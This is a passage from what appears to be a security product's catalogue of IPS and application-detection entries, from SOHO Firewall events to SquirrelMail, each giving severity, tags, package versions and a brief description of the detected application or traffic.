Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: IP accounting messages contain information on a specific IP session that was routed over the SOHO Firewall.
Back to top

SOHO Firewall: IP connection

About this situation: SOHO Firewalls: IP connection.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: An IP connection was received by the SOHO Firewall.
Back to top

SOHO Firewall: ISDN Accounting

About this situation: SOHO Firewalls: ISDN accounting message.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: An ISDN accounting message contains information on an ISDN call that was either placed or received by the SOHO Firewall.
Back to top

SOHO Firewall: NAT event

About this situation: SOHO Firewalls: NAT event.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SOHO Firewall has logged a NAT event.
Back to top

SOHO Firewall: PPP event

About this situation: SOHO Firewalls: PPP event.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SOHO Firewall has logged a PPP event.
Back to top

SOHO Firewall: SIF event

About this situation: SOHO Firewalls: SIF event.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SOHO Firewall has logged an SIF event.
Back to top

SOHO Firewall: System event

About this situation: SOHO Firewalls: System event.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SOHO Firewall has logged a System event.
Back to top

SOHO Firewall: TIME event

About this situation: SOHO Firewalls: TIME event.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SOHO Firewall has logged a TIME event.
Back to top

SOHO Firewall: Wireless event

About this situation: SOHO Firewalls: Wireless event.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SOHO Firewall has logged a Wireless event.
Back to top

Solano-Labs

About this situation: Application Solano-Labs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Solano Labs provides a fast solution for Continuous Integration and Deployment.
Back to top

SolarWinds

About this situation: Application SolarWinds detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SolarWinds provides IT management software to customers of enterprises to small businesses. Its software focused on performance management, configuration and compliance for managing networks.
Back to top

Solid-Commerce

About this situation: Application Solid-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Solid Commerce is an all-in-one eCommerce solution designed for complete operational automation on multiple channels, from webstores to marketplaces.
Back to top

SolidFire

About this situation: Application SolidFire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SolidFire - SSD storage systems designed for public and private clouds.
Back to top

Solidify

About this situation: Application Solidify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Solidify provides B2B software solutions that integrate with your existing systems.
Back to top

Solidshops

About this situation: Application Solidshops detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SolidShops.com is a hosted e-commerce solution that allows you to run a professional webshop.
Back to top

Solium

About this situation: Application Solium detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Solium is a provider of web-based stock plan administration technology and services.
Back to top

Solve360

About this situation: Application Solve360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Solve360 is a modern web-based CRM application that integrates features to manage client projects.
Back to top

Sonera-Viihde

About this situation: Sonera Viihde usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1638-5242
Description: Sonera Viihde is a media streaming, IPTV and movie rental service.
Back to top

Sonian

About this situation: Application Sonian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sonian cloud-based email archiving solutions ensure cost-effective, unlimited retention, storage and powerful search functionality.
Back to top

Sonico.com

About this situation: Sonico.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

SonicWall Connect Tunnel

About this situation: Endpoint Context Agent based SonicWall Connect Tunnel Connection
Context: EI Correlation
Severity: 1
Tags: Tunneling, Endpoint
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1017-5242
Description: SonicWall Connect Tunnel endpoint application has been detected. SonicWall Connect Tunnel is a component of the SonicWall Secure Mobile Access solution. It enabless secure access to applications and Windows file shares.
Back to top

SonicWall Secure Mobile Access

About this situation: Endpoint Context Agent based SonicWall Secure Mobile Access Connection
Context: EI Correlation
Severity: 1
Tags: Tunneling, Endpoint
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1017-5242
Description: SonicWall Secure Mobile Access endpoint application has been detected. SonicWall Secure Mobile Access is a secure access gateway.
Back to top

Sony-PlayStation-Network

About this situation: Sony PlayStation Network traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1238-5242
Description: Sony PlayStation Network usage as been detected. PlayStation Network is an online service for Sony PlayStation 3 game console.
Back to top

Soonr

About this situation: Soonr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: Soonr Workplace enables businesses and teams to store, share, access, search, edit and sync files across platforms with support for more than 800 mobile devices including Android, Blackberry, iPhone and iPad.
Back to top

SopCast

About this situation: SopCast traffic
Context: Application Context
Severity: 1
Tags: Protocols, Media
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1641-5242
Description: SopCast Client is a free P2P software to view and broadcast video streams.
Back to top

Sophos

About this situation: Application Sophos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sophos is a security software and hardware company. It develops products for communication endpoint, encryption, network security, email security and mobile security.
Back to top

Sophos-Live-Protection

About this situation: Sophos Live Protection usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: This service is used to proved live updates for Sophos products.
Back to top

Sophos-Update-Service

About this situation: Sophos update service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-1638-5242
Description: This service is used to update various Sophos products.
Back to top

SopraSteria

About this situation: Application SopraSteria detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SopraSteria provides digital transformation
Back to top

Sorenson-Squeeze-6

About this situation: Application Sorenson-Squeeze-6 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sorenson Squeeze 6 is video workflow solution, personalized for anyone working with video.
Back to top

SOS-Online-Backup

About this situation: Application SOS-Online-Backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SOS Online Backup is an online backup for small and medium businesses and IT/managed service provider.
Back to top

SoulSeek

About this situation: SoulSeek P2P traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: SoulSeek peer-to-peer usage. Soulseek is a p2p file-sharing network.
Back to top

Soundation

About this situation: Soundation usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Soundation Studio has all the functionality of a professional desktop DAW including real time effects, virtual instruments, automation etc.
Back to top

Soundcloud

About this situation: Soundcloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-769-5211
Description: Soundcloud is a social audio distribution and music service.
Back to top

Soundhound

About this situation: SoundHound usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: SoundHound is a mobile phone service that allows users to identify music by humming, singing or playing a recorded track. Its a music search engine available on the Apple App Store,Google Play and Windows Marketplace for Mobile.It enables users to identify music by playing, singing or humming a song. Source: Wikipedia
Back to top

Sourceforge

About this situation: Sourceforge usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-630-5211
Description: SourceForge is an online source code repository. The application uses a web-based technology model.
Back to top

Southwest

About this situation: Southwest usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Southwest is a major U.S. airline and the world's largest low-cost carrier.
Back to top

Sovrn

About this situation: sovrn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: sovrn is a data-driven supply side platform with one of the largest ad exchanges in the world.
Back to top

Space Engineers

About this situation: Endpoint Context Agent based Space Engineers
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: Space Engineers endpoint application has been detected. Space Engineers is a sandbox game set in space, developed by Keen Software House.
Back to top

Space-Federation-Games

About this situation: Space Federation Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Space-Monkey

About this situation: Application Space-Monkey detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Space Monkey - cloud storage service.
Back to top

Spaces

About this situation: Application Spaces detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spaces lets you create landing pages integrated with payments in no time, with no hassle. And it's free to use
Back to top

SpamAssasin-Update-Service

About this situation: SpamAssasin update service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1638-5242
Description: This service is used to update open source Apache SpamAssasin product.
Back to top

Spamina

About this situation: Application Spamina detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SPAMINA is a security company that develops and provides corporations with flexible and Secure Digital Communications.
Back to top

Spanning

About this situation: Application Spanning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spanning is a provider of SaaS data protection for Google Apps, Salesforce and Office 365, prevents data loss with automated backup and recovery for cloud applications..
Back to top

sparesFinder

About this situation: Application sparesFinder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Software and services for standardising, governing, enriching, finding, and leveraging material master data across the enterprise.
Back to top

Spark-Pay

About this situation: Application Spark-Pay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spark Pay is an ecommerce software platform that lets you run one or multiple stores for B2C or B2B businesses.
Back to top

Sparkroom

About this situation: Application Sparkroom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sparkroom - powerful performance marketing software for higher education, integrates marketing data, automates marketing processes and provides marketing analytics that drive smarter decisions and a more optimized budget. Sparkroom is cloud-based and helps marketers grow enrollments while controlling the cost of student acquisition.
Back to top

Speak2Leads

About this situation: Application Speak2Leads detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Immediately after a prospective customer submits their inquiry via from any web form, you will receive an automated inbound call from Speak2Leads notifying you that you have a hot new Internet lead with their name and nature of inquiry.
Back to top

Special Events

About this situation: Sites devoted to a current event that requires separate categorization.
Context: URL Application Context
Severity: 1
Tags: Special Events, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites devoted to a current event that requires separate categorization.
Back to top

Spectre-Side-Channel-Binary-SHA1

About this situation: Spectre Side channel attack binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1034-5242
Last changed: sgpkg-ips-1034-5242
Description: A file that has a SHA1 checksum matching to Spectre Side channel attack binary has been detected.
Back to top

SpeechModelDownload

About this situation: Endpoint Context Agent based SpeechModelDownload.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Description: A network connection launched by the Windows system process SpeechModelDownload.exe was detected. SpeechModelDownload.exe is used for downloading new speech models for Windows Speech recognizion.
Back to top

SpeedIT

About this situation: Application SpeedIT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SpeedIT provides Server and Hosting-packages solutions.
Back to top

Speedtest

About this situation: Speedtest usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-1233-5242
Description: Speedtest is a web service that tests users' Internet connection speed. The service can be accessed using a web browser at site: http://www.speedtest.net.
Back to top

Speedyrails

About this situation: Application Speedyrails detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Speedyrails is a web hosting provider with managing and scaling up ruby on rails sites.
Back to top

Speedyshare

About this situation: speedyshare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Speek

About this situation: Application Speek detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Speek - Conference Calling Making service. Send an easy-to-remember personal link, instead of a clunky PIN Easily share files or record calls with the click of a button.
Back to top

Spektrix

About this situation: Application Spektrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spektrix - provider of cloud-based ticketing, marketing, CRM and fundraising software.
Back to top

Sphera-Cloud

About this situation: Application Sphera-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1396-5242
Description: Rivo Audits and Inspections eases the administrative burden of the audit and inspection process by automating standard tasks across your organization. You can schedule audits, capture non-conformances, gather evidence and compile ad hoc or regular reports.
Back to top

Sphera-Solutions

About this situation: Application Sphera-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sphera Solutions is a software and information services provider that specializes in operational risk, environmental performance, and product stewardship.
Back to top

SPI-Shopping-Cart

About this situation: Application SPI-Shopping-Cart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spi Cart provides hosted shopping cart and e-commerce platform provides you with state of the art tools to manage every aspect of your business.
Back to top

SpiceCSM

About this situation: Application SpiceCSM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SpiceCSM - Contact Center Software that combines a Dynamic Call Handling Engine, a Data Integration Platform, and Robust Collaborative Reporting.
Back to top

Spiceworks

About this situation: Application Spiceworks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spiceworks is the professional network for the IT industry.
Back to top

Spidergap

About this situation: Application Spidergap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spidergap is a customizable solution that helps employees to prioritize and plan their development.
Back to top

Spideroak

About this situation: SpiderOak usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to back up, sync, share, access, and store their data to an offsite server. The service uses encrypted cloud storage and client-side encryption key creation. Source: Wikipedia
Back to top

SpiderScribe

About this situation: Application SpiderScribe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SpiderScribe is an online mind mapping and brainstorming tool. It lets you organize your ideas by connecting notes, files, calendar events, etc. in free-form maps.
Back to top

Spigit

About this situation: Application Spigit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spigit is a crowdsourcing software that is used for process innovation, breakthrough ideas, cost reductions, and to engage employees in innovation initiatives.
Back to top

Spinchat

About this situation: SpinCHAT usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Splashtop

About this situation: Application Splashtop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Splashtop remote-desktop software allows users to connect to and control computers from a mobile-computing device, such as an iPad, iPhone, or Android device
Back to top

Splunk

About this situation: Application Splunk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Splunk produces software for searching, monitoring, and analyzing machine-generated big data, via a web-style interface. Splunk captures, indexes and correlates real-time data in a searchable repository from which it can generate graphs, reports, alerts, dashboards and visualizations.
Back to top

Spoke

About this situation: Application Spoke detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spoke allows business professionals to create user-friendly profiles of companies and people in a smooth and organized process that replaces existing inefficient data gathering techniques
Back to top

Spokeo

About this situation: Application Spokeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spokeo is a people search platform enabling users to reconnect with friends and families and discover information about individuals.
Back to top

Spongecell

About this situation: Application Spongecell detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spongecell
Back to top

Sport Hunting and Gun Clubs

About this situation: Sites that provide information about or directories of gun clubs and similar groups, including war-game and paintball facilities.
Context: URL Application Context
Severity: 1
Tags: Sports, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or directories of gun clubs and similar groups, including war-game and paintball facilities.
Back to top

Sports

About this situation: Sites that provide information about or promote sports, active games and recreation.
Context: URL Application Context
Severity: 1
Tags: Sports, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote sports, active games and recreation.
Back to top

Sports-Tracker

About this situation: Sports Tracker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-773-5211
Description: Sports Tracker is a sports tracking service.
Back to top

SpotFlux-VPN

About this situation: SpotFlux VPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-1638-5242
Description: SpotFlux is a free VPN software that uses OpenVPN over TCP port 443. OpenVPN in TCP port 443 must be blocked in order to completely block SpotFlux.
Back to top

Spotify

About this situation: Endpoint Context Agent based Spotify detection
Context: EI Correlation
Severity: 1
Tags: Streaming Media, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Spotify endpoint application has been detected.
Back to top

Spotify

About this situation: Spotify traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1794-5242
Description: Spotify is a digital music streaming service.
Back to top

Spotlight-Reporting

About this situation: Application Spotlight-Reporting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Spotlight Reporting suite of apps are designed to help users to build trusted advisor relationships with clients and generate new revenue streams for business.
Back to top

SpotTrot-Platform

About this situation: Application SpotTrot-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The SpotTrot technology platform powers mobile commerce for many of the world's most recognized music, sports and entertainment brands.
Back to top

SpotXchange

About this situation: SpotXchange usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: SpotXchange is an online video advertising platform.
Back to top

Spredfast

About this situation: Application Spredfast detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spredfast is a software as a service company that provides an enterprise-class social relationship platform
Back to top

Spree-Commerce

About this situation: Application Spree-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Spree Commerce is an automated enterprise e-commerce solution that manages clients operations.
Back to top

Spreedly

About this situation: Spreedly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Spreedly enables marketplaces and platforms to securely create a universal credit card token that works across the broadest range of payment endpoints possible.
Back to top

SpringAhead

About this situation: Application SpringAhead detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SpringAhead is an online time tracking, billing and expense reporting solution that is fast, easy and fully integrated with your accounting system.
Back to top

SpringBoard

About this situation: Application SpringBoard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Springboard is a unique opportunity to turbocharge your startup by working with accomplished mentors and experts in a dedicated business environment. In short Springboard gives you the best chance to explore and realise the potential of your startup
Back to top

Springboard-Retail

About this situation: Application Springboard-Retail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Springboard Retail is a cloud Retail Management System with web based POS and inventory management software.
Back to top

Springcm

About this situation: SpringCM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: SpringCM made its debut on the software as a service marketplace as an offshoot product based heavily upon a document sharing.SpringCM announced SpringCM Mobile for iPad, iPhone and Android, allowing business people to securely share content and work together anytime, anywhere, from virtually any mobile device.
Back to top

Springloops

About this situation: Application Springloops detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Springloops is a web-based Git and Subversion version control and hosting service with integrated deploy and code collaboration features for web and software developers.
Back to top

Springpad

About this situation: Application Springpad detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Springpad is personal assistant app that helps you not only remember what
Back to top

Sprint

About this situation: Application Sprint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sprint offers wireless and wireline communication services to consumer, business and government users.
Back to top

Sprint.ly

About this situation: Application Sprint.ly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sprintly is agile project management software.
Back to top

Sproutsocial

About this situation: SproutSocial usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Sprout Social is a social media management system (SMMS) with functionality for multiple person teams and a focus on engagement, publishing and analytics. Sprout's platform currently offers users the ability to integrate with Facebook, Twitter, Google plus, LinkedIn, Zendesk and UserVoice.
Back to top

SPS-Commerce

About this situation: Application SPS-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SPS Commerce provides cloud-based supply chain management software to retailers, suppliers, third-party logistics providers and partners.
Back to top

SputnikNet

About this situation: Application SputnikNet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SputnikNet is the web application for running Wi-Fi hotspots over the internet. SputnikNet
Back to top

Spyware

About this situation: Sites that download software that generate HTTP traffic (other than simple user identification and validation) without a user's knowledge.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that download software that generate HTTP traffic (other than simple user identification and validation) without a user's knowledge.
Back to top

Sqoot

About this situation: Application Sqoot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sqoot is the preeminent deal aggregation and distribution platform that enables web and mobile publishers to serve targeted, relevant deals to their customers.
Back to top

Square

About this situation: Application Square detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Square is a merchant services aggregator and mobile payment company that aims commerce through technology.
Back to top

Square-Enix

About this situation: Application Square-Enix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Square Enix is a video game developer, publisher, and distribution company.
Back to top

Squidtv

About this situation: squidtv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

SquirrelMail

About this situation: Squirrel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-479-5211
